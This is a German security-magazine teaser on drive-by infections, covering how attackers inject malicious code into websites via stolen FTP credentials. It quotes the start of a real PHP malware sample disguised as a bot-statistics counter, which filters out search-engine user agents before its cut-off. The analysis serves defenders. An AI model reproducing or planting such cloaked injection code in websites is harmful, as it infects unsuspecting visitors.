© saicle/Shutterstock.com
Drive-by-Infektionen gefährden Server und Clients

Gefährliche Counter und mehr


Bei einem Angriff auf einen Webserver haben die Angreifer es nicht immer auf den Server selbst bzw. seine Daten abgesehen. Noch öfter soll der Server für eine Drive-by-Infektion präpariert werden. Und das ist dann nicht nur für den Server, sondern noch mehr für die Besucher der Website gefährlich.

Drive-by-Infektionen heißen so, weil die Rechner der Benutzer quasi im Vorbeifahren oder eigentlich beim Vorbeisurfen mit Schadsoftware infiziert werden. Auf entsprechend präparierten Webseiten wartet JavaScript-Code auf Besucher, um dann über Schwachstellen im Webbrowser und seinen Plug-ins Schadcode auf deren Rechner einzuschleusen.

Das eigentliche Ziel der Cyberkriminellen sind zwar die Rechner der Benutzer, aber bevor sie die angreifen können, müssen sie zuerst einen Server kompromittieren. Um den Code zur Durchführung der Drive-by-Infektion in harmlose Websites einzuschleusen, gibt es mehrere Möglichkeiten: Die Cyberkriminellen können Schwachstellen in der Webanwendung oder im Webserver ausnutzen, einen Ad-Server kompromittieren oder sich FTP-Zugangsdaten zu Webservern besorgen.

Unbefugte Zugriffe über FTP

Das Ausspähen der FTP-Zugangsdaten übernimmt im Allgemeinen entsprechend konfigurierte Spyware, sie können aber auch bei ihrer unverschlüsselten Übertragung, zum Beispiel über ein offenes WLAN, ausgespäht werden.

Die Nutzung von ausgespähten Zugangsdaten hat für die Cyberkriminellen zwei Vorteile: Sie sind nicht auf Schwachstellen in der Webanwendung oder im Webserver angewiesen, und wenn über die angegriffenen Websites durch die Drive-by-Infektion (auch) Spyware verteilt wird, gibt es laufend neue Zugangsdaten frei Haus. Die für den Start benötigten Zugangsdaten können die Cyberkriminellen zum Beispiel auf dem Schwarzmarkt kaufen.

Angeblicher Counter in PHP-Skripten

Im Mai 2012 wurde mir der PHP-Code in Listing 1 zugeschickt, der über ausgespähte FTP-Zugangsdaten in harmlose Webanwendungen eingeschleust worden war. Der Code ist unverändert, die Schreibfehler in den Kommentaren stammen von den Cyberkriminellen.

Listing 1

<?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1;  // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google search bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&& (strstr($sUserAgent, 'yahoo') == false)&& (strstr($sUserAgent, 'baidu') == false)&& (strstr($sUserAgent, 'msn') == false)&& (strstr($sUserAgent, 'opera') == false)&& ...

Neugierig geworden?

Angebote für Teams

Für Firmen haben wir individuelle Teamlizenzen. Wir erstellen Ihnen gerne ein passendes Angebot.

Das Library-Modell:
IP-Zugang

Das Company-Modell:
Domain-Zugang